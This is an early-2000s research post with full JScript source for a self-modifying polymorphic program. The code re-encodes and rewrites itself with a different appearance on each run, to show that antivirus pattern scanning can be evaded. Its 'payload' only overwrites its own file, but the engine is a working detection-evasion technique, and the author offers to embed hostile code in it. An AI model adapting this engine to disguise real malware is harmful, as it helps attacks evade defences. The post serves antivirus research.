Hide and Seek Game On Script Languages

Self-modifying capable codes can be written in script languages as well as in assembly.
This characteristic could make script languages suitable for writing polymorphic worms and
viruses. The question is: Could a self-modifying code written in a script language and may
embedded in html escape from generic pattern based and simple statistical scans? If the
answer is affirmative, to detect a self-modifying code, a scanning program needs tailored
detection methods rather than generic, advanced statistical analysis, semantic analysis or
simulation methods or even needs to integrate with script engines. These advanced methods
are costly, both for CPU times on user computers and for developing a suitable detection
code for AV programmers.

Time is very precious for (stopping) viruses/worms spreading by emails, AV companies have
no option for delays to include them in their databases. As email viruses spread very fast,
users get infected before the AV update arrives, so AV firms are focusing on heuristic methods
to detect unknown codes immediately when it reaches the user computer. Although AV firms may
have their proprietary heuristic algorithms, it is safe to assume that currently available
detection algorithms would have difficulties with self-modifying codes.

It is historically proven that AV firms have failed when a novel type of virus/worms arrives,
and the costs of these failures are estimated by billions. (If these figures are realistic,
millions of $'s would have been spent on AV research.) So there are good reasons and would be
resources for developing advanced scanning methods in advance for detecting polymorphic codes
which could be written in script languages. Even though a generic (heuristic) method for
 detecting unknown polymorphic viruses could have little success, I think such a work a-priori
will dramatically shorten the development time of the scanner when the real virus arrives.

So far, a polymorphic code sample is given below as a test-bed. The objective is to show the
weakness or low reliability of basic pattern detections and statistical fingerprint finding
methods. For simplicity, I wrote it as a stand alone JavaScript code without taking advantage
of richness of HTML or MIME environment.

The code below is in initial source format. One should run it and obtain AUTOMODI.JS in
encoded form.

Each time AUTOMODI.JS is run, a new image is generated. The code can be run by
Wscript.exe or Cscript.exe on Windows platform.

Code does perform the followings:
1)	Decode itself.
2)	Display its source.
3)	Encode itself.
4)	Write a new image under the same name and directory.

Run time is less than 2 seconds on a Pentium-III machine.

For the purpose of more comprehensible tests, hostile code specified or provided by testers would
be adapted/embedded within the code (w/wo functionality) upon request to the author.


Hamdi Ucar April 24, 2001

Standard Disclaimer.


---------------------------------- JSCRIPT CODE ------------------------------------

var cc=
"oo=0;c =null;" +
"function z(a){with(Math)return floor(random()*a)}" +
";"+
"w=String.fromCharCode;" +
"var g=new Array(),sa=new Array(),ka=new Array()," +
	"i=z(3)?39:34,qz=w(i),qq=w(73-i)," +
	"u='',bz=w(92)," +
	"d=hs(),ez=d+'='+d,pz=d+'+'+d," +
	"lz=hs()+'(',rz=')'+hs()," +
	"jz=hs()+(lf=w(13,10))+(z(4)?hs():w(9))," +
	"cz=';'+hs()+hs()," +
	"kz=z(3)?jz:cz+jz," +
	"pp=z(3),k,m=68683,vv,dd,az=z(2)?65:97," +
	"zb=')]}',"+
	"oz='([{?|^.!&,-/:;<=>@ghijklmnopqrstuwxyzJAMXILOSTFUCHREW'+qz+qq," +
	"yy=z(12),yr=z(12),yp=z(20),ps;" +

"bb='Jax363 - Auto Modifying Code With Random Apperance Jscript Example'+lf+lf+" +
	"'Copyright (c) Hamdi Ucar, Orchestra Communication Systems Ltd.,2001'+lf+lf+" +
	"'Email: hamdix@verisoft.com.tr'+lf+lf+" +
	"'This program create or rewrite a file named automodi.js on the current directory.'+lf; " +

/* remove the below line for quite operation */

"WScript.Echo(bb+lf+'Self Listing:'+lf+lf+cc);" +

"for(i=0;i<11;i++)mv(i,g,z(3));" +
"az^=32;"+
"ux=g[8];"+
"aa=g[10];" +
"if(z(2))vv=g[9];"+

"cc=gg('oo='+ ++oo+';cc='+g[0]+';'+g[0]+cc.slice(cc.indexOf(' ='),cc.lastIndexOf(' ')+1),'['+qz+qq+']',qz);" +

"if((uv=z(3))>1){"+
	"dd=u;while(z(12))dd+=oz.charAt(z(55));" +
	"d=cc.slice(i=cc.indexOf(d=w(125,59),z(3800))+2,k=cc.indexOf(d,i+z(4200-i))+2);" +
	"cc=cc.substr(0,i)+zo(d,dd)+cc.substr(k)"+
"}" +
";"+

"cc=fo(cc+sy(z(140)&254)+'*/',i=z(60000)+1,k=z(m));" +

"q=Math.floor(m/(p=70+z(30)));" +

"d=sw(' 5=  2='+(z(3)?m:sw(sw(p,'*',q),'+',m-p*q)),cz,sw(' 3='+i,cz,' 7='+k))+cz+" +
	"sw(' 1='+sw(' 3','+',(9137-i)),cz,' 0='+qz+qz)+cz+" +
	"(z(4)?'for(;-- 5;)':'while(-- 5)')+" +
	"'{ 7*= 1; 7%= 2; 4= 7- 3;" +
	"if( 4'+sw('>=0',' &&  4','<'+cc.length)+') 0+=  6.charAt ( 4) } '+" +
	"(uv>1?' 0=  8 ( 0);':u)+"+
	"(vv?vv:'eval')+' ( 0)';" +

"if(uv){"+
"for(dd=u,i=0;i<d.length;i++)"+
	"dd+=(z(3)&&(c=d.charCodeAt(i))&64)?'%'+c.toString(16):d.charAt(i);" +
"d=dd;" +
"}" +
";"+

"for(i=9;i--;)d=gg(d,' '+i,g[i]);" +

"d=gg(d,';',';'+hs());" +

"et=g[6];" +
"tt=m=pk(cc,0,4000/(2+z(yr+3)));" +
"sa[m]=qq+qq;" +
"k=m=pk(d,m+1,2+z(22-yr),1+z(3),uv?0:99);" +

"if(z(3-uv)){" +
	"p=z(5)+2;" +
	"for(i=0;i<m;i+=z(p))sa[i]=gg(sa[i],w(c=z(26)+97),bz+c.toString(8))" +
"}" +

"if(uv)sa[m++]='unescape';" +

"dd=g[ev=m]='eval';" +

"if(z(2)||vv)sa[m++]=dd;" +

"dd=d=u;" +
"for(i=0;i<m;i++)d+=(i==tt)?u:w(i);" +
"while(i=d.length){" +
	"dd+=d.charAt(i=z(i));" +
	"d=d.substr(0,i)+d.substr(i+1)" +
"}" +
";"+

"p=z(6)+2;" +
"for(i=0;i<m;i++){" +
	"if(pp)g[dd.charCodeAt(i)]=aa+(pp<2?i+10+yy:'['+i+']');" +
	"else mv(i,g,z(p)+1)" +
"}" +

/* comment section, to remove replace below line with ' "d=jz;" + '  */

"d='/*'+lf+lf+bb+lf+lf+'(Run '+oo+')'+lf+lf+'*/'+lf+jz;" +

"if(pp==2)d+=(z(4)?'var ':hs())+aa+ez+(z(3)?hs():jz)+'new Array()'+kz;" +
"pp=0;" +
"p=0;" +
"for(i=0;i<m-1;i++){" +
	"if(z(1+yy/80)&&ps!=1){d+=jz+'{';p++}" +
	"if(pp<i)pp=i;" +
	"c=sa[q=dd.charCodeAt(i)];" +
	"if(q<k){" +
		"if(q>0)if(sa[q-1]==u)c=fa(q,-1)+pz+c;" +
		"if(q<k-1)if(sa[q+1]==u)c+=pz+fa(q,1);" +
		"sa[q]=u" +
	"}" +
	"pq(g[q]+ez+c);" +
	"if(z(1+p/12)&&ps!=1){d+='}'+jz;p--}" +
"}" +
";"+

"if(uv>1){pq(ux+ez+g[k]);if(z(2))g[k]=ux;}"+

"pq(et+ez+g[ka[tt-1]]+(vv?','+vv+ez+g[ev]:u));"+

"et=g[ka[tt+1]];" +

"while(z(yr))ga();" +

"pq((z(3)?g[4]+ez:u)+g[ev]+(z(3)?hs():jz)+lz+(uv?g[k]+lz+et+rz:et)+rz);" +

"while(z(yy)||ps==1)ga();" +

"while(p--)d+=w(125);" +

/*variable "d" contain the new compiled image  */

/* payload */

"f=new ActiveXObject('Scripting.FileSystemObject');" +
"a=f.CreateTextFile('automodi.js',true);" +
"a.Write(d);a.Close();" +

/* end of payload */


/************** execution ends here *****************/


"function hs(){return(z(2)?' ':u)}" +

"function ha(f){var x=z(f&4?26:36);return w(x+=x<26?(((f&1)<<5)^az):22)}" +

"function pq(s){" +
	"d+=ps?lz+s+rz+(--ps?'==!=+ - < > >=<=||&&'.substr(z(yr+5)&30,2):cz):" +
	"s+(z(yy)||(ps=z(yp)?0:2)?cz:kz)" +
"}" +
";"+

"function mv(n,a,x){" +
	"var v,f,j;" +
	"do{" +
		"f=0;j=x;" +
		"v=ha(4);" +
		"if(x<3&&az&32)v+=ha(1);else while(j--)v+=ha(z(yy&2));" +
		"for(j=0;j<n;j++)if(v==a[j]){f=1;break}" +
	"}while(f);" +
	"return a[n]=v" +
"}" +

"function sw(a,m,b){return(z(2)?a+m+b:b+m+a)}" +

"function pk(a,j,x,y,s){" +
	"var p=0,q;" +
	"for(;p<a.length;j++){" +
		"q=z((s&&s<p)?y:x);"+
		"while(a.charAt(p+q++)==bz);" +
		"sa[ka[j]=j]=qq+gg(a.substr(p,q),bz+bz,bz+bz)+qq;" +
		"p+=q}" +
	"return j" +
"}" +

"function fa(x,q){" +
	"var j=x+q,n=ka[j],v=g[n];" +
	"for(j=0;j<=k;j++)if(ka[j]==n)ka[j]=x;" +
		"j=dd.charCodeAt(pp);" +
		"if(ka[j]==j&&sa[j]!=u){g[j]=v;if(pp<m)pp++}" +
	"return v" +
"}" +
";"+

"function fo(s,q,h){" +
	"var x,j=0,f=s.length,c=new Array(f);" +
	"while(j<f){" +
		"h=h*9137%m;" +
		"x=h-q;if(x<f&&x>=0)c[x]=s.charAt(j++)}" +
	"return c.join(u)" +
"}" +

"function gg(s,a,x){return s.replace(eval('/'+a+'/g'),x)}" +

"function gb(){" +
	"var x;" +
	"while(et==(x=g[z(tt)]));" +
	"return x" +
"}" +
";"+

"function ga(){" +
	"var s=cc.substr(z(3600),z(yp*4)+3);" +
	"if(yy&7)s=zo(s,zb);" +
	"pq(gb()+ez+qq+s+qq+(z(3)?pz+gb():u))" +
"}" +

"function sy(b){" +
	"var h=0,c,s=u;" +
	"do{" +
		"if(--h<0){" +
			"c='()[]{}<>=!&?*,-./|:^'.substr(z(10)*2,2);" +
			"h=z(b/8)+1" +
		"}" +
		"s+=c" +
	"}while(s.length<b);" +
	"return s" +
"}" +

"function zo(s,a){" +
	"var i,x,c,h,b='()[]{}?|^.';"+
	"for (i=a.length;i--;)" +
		"for(x=b.indexOf(c=a.charAt(i)),h=x<0?u:bz;c;x=-1){" +
			"s=gg(s,h+c,'%'+(c.charCodeAt(0).toString(16)));" +
			"c=b.charAt(x^1);" +
		"}" +
	"return s" +
"}" +
";"+

"/"+"* *"+"/" ;

eval(cc);

--------------------------------- END OF CODE ------------------------------------